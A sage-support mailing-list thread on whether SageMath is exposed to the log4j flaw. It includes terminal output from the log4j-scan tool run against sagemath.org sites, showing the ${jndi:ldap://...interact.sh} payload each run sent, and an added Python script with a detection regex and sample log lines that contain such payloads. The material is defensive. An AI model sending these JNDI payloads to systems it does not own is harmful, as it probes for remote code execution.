Has anyone more knowledgeable than I (admittedly a low bar) about sage's internals thought about whether sage uses any libraries that make it vulnerable to the log4j vulnerability?

- Angela
--
You received this message because you are subscribed to the Google Groups "sage-support" group.
To unsubscribe from this group and stop receiving emails from it, send an email to sage-support...@googlegroups.com.
To view this discussion on the web visit https://groups.google.com/d/msgid/sage-support/c944dbbe-d640-4a25-b9e8-9c0f0c13b437n%40googlegroups.com.
Hello folks,

In case you are concerned that you may be impacted by the Java log4j bug, you can download this application which will check if a supplied URL is vulnerable to the bug:
Last login: Tue Dec 14 16:45:00 on ttys058
wstein@max ~ % python3 log4j-scan.py -u https://ask.sagemath.org
/Library/Frameworks/Python.framework/Versions/3.10/bin/python3: can't open file '/Users/wstein/log4j-scan.py': [Errno 2] No such file or directory
wstein@max ~ % cd /tmp/log4j-scan
wstein@max log4j-scan % python3 log4j-scan.py -u https://ask.sagemath.org
[•] CVE-2021-44228 - Apache Log4j RCE Scanner
[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
[•] Secure your External Attack Surface with FullHunt.io.
[•] Initiating DNS callback server (interact.sh).
[%] Checking for Log4j RCE CVE-2021-44228.
[•] URL: https://ask.sagemath.org
[•] URL: https://ask.sagemath.org | PAYLOAD: ${jndi:ldap://ask.sagemath.org.9187j80iik2n4oq9ud1re041i81939unm.interact.sh/tjtni2c}
[•] Payloads sent to all URLs. Waiting for DNS OOB callbacks.
[•] Waiting...
[•] Targets does not seem to be vulnerable.
wstein@max log4j-scan % python3 log4j-scan.py -u https://wiki.sagemath.org
[•] CVE-2021-44228 - Apache Log4j RCE Scanner
[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
[•] Secure your External Attack Surface with FullHunt.io.
[•] Initiating DNS callback server (interact.sh).
[%] Checking for Log4j RCE CVE-2021-44228.
[•] URL: https://wiki.sagemath.org
[•] URL: https://wiki.sagemath.org | PAYLOAD: ${jndi:ldap://wiki.sagemath.org.5607rfj3i02047m4itt61pu684hsv539c.interact.sh/zpbgczb}
[•] Payloads sent to all URLs. Waiting for DNS OOB callbacks.
[•] Waiting...
[•] Targets does not seem to be vulnerable.
wstein@max log4j-scan % python3 log4j-scan.py -u https://trac.sagemath.org
[•] CVE-2021-44228 - Apache Log4j RCE Scanner
[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
[•] Secure your External Attack Surface with FullHunt.io.
[•] Initiating DNS callback server (interact.sh).
[%] Checking for Log4j RCE CVE-2021-44228.
[•] URL: https://trac.sagemath.org
[•] URL: https://trac.sagemath.org | PAYLOAD: ${jndi:ldap://trac.sagemath.org.xgge21465p6t46hq87n64t350054fg25o.interact.sh/kjy8og1}
[•] Payloads sent to all URLs. Waiting for DNS OOB callbacks.
[•] Waiting...
[•] Targets does not seem to be vulnerable.
wstein@max log4j-scan % python3 log4j-scan.py -u https://www.sagemath.org
[•] CVE-2021-44228 - Apache Log4j RCE Scanner
[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
[•] Secure your External Attack Surface with FullHunt.io.
[•] Initiating DNS callback server (interact.sh).
[%] Checking for Log4j RCE CVE-2021-44228.
[•] URL: https://www.sagemath.org
[•] URL: https://www.sagemath.org | PAYLOAD: ${jndi:ldap://www.sagemath.org.bx6i660og07o49v6qb2f9ou48r846433j.interact.sh/1qs7xvd}
[•] Payloads sent to all URLs. Waiting for DNS OOB callbacks.
[•] Waiting...
[•] Targets does not seem to be vulnerable.
wstein@max log4j-scan %
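For anyone who wants to check their own web server logs for the same kind of probe that log4j-scan sends, here is an added example (not code from this thread, from Sage, or from the scanner): a small Python script that flags requests carrying a ${jndi:...} lookup string, extracts the callback host, and marks callbacks that go to the interact.sh out-of-band service the scanner uses. The log lines, IP addresses and hostnames in it are constructed.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the original thread).
# Lines 1-2 are benign; line 3 carries a lookup string of the kind
# log4j-scan sends, in the User-Agent field; line 4 carries a URL-encoded
# one in the query string.
SAMPLE_LOG = """\
203.0.113.5 - - [14/Dec/2021:16:45:01 +0000] "GET /questions/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [14/Dec/2021:16:45:02 +0000] "GET /static/app.js HTTP/1.1" 200 884 "-" "Mozilla/5.0"
198.51.100.7 - - [14/Dec/2021:16:45:03 +0000] "GET / HTTP/1.1" 200 5120 "-" "${jndi:ldap://example.invalid.abc123.interact.sh/x}"
198.51.100.7 - - [14/Dec/2021:16:45:04 +0000] "GET /?q=%24%7Bjndi%3Armi%3A%2F%2Fcallback.example.invalid%2Fa%7D HTTP/1.1" 200 5120 "-" "curl/7.79"
"""

# Literal ${jndi:<scheme>://<host>...} lookup, as in the scanner's PAYLOAD line.
JNDI_RE = re.compile(r"\$\{jndi:(ldaps?|rmi|dns):/*([^/}\s]+)", re.IGNORECASE)

# Out-of-band DNS services that scanners such as log4j-scan use for callbacks
# (interact.sh is the one named in the thread).
OOB_SERVICE_SUFFIXES = (".interact.sh",)


def find_jndi_lookups(line):
    """Return (scheme, callback_host) pairs found in one log line.
    The line is URL-decoded once so a lookup hidden in a query string is seen too."""
    decoded = unquote(line)
    return [(m.group(1).lower(), m.group(2)) for m in JNDI_RE.finditer(decoded)]


def scan_log(text):
    """Flag log lines containing JNDI lookups. Returns one dict per lookup with
    the line number, source IP, scheme, callback host and whether the callback
    points at a known OOB scanning service (a likely scanner run rather than a
    targeted attempt, but still worth recording)."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        lookups = find_jndi_lookups(line)
        if not lookups:
            continue
        src_ip = line.split(" ", 1)[0]
        for scheme, host in lookups:
            hits.append({
                "line": lineno, "src": src_ip, "scheme": scheme, "host": host,
                "oob_service": host.lower().endswith(OOB_SERVICE_SUFFIXES),
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

A hit tells you only that a lookup string reached the server, not that anything evaluated it; the DNS callback that log4j-scan waits for is the signal that an actual Log4j instance resolved the name.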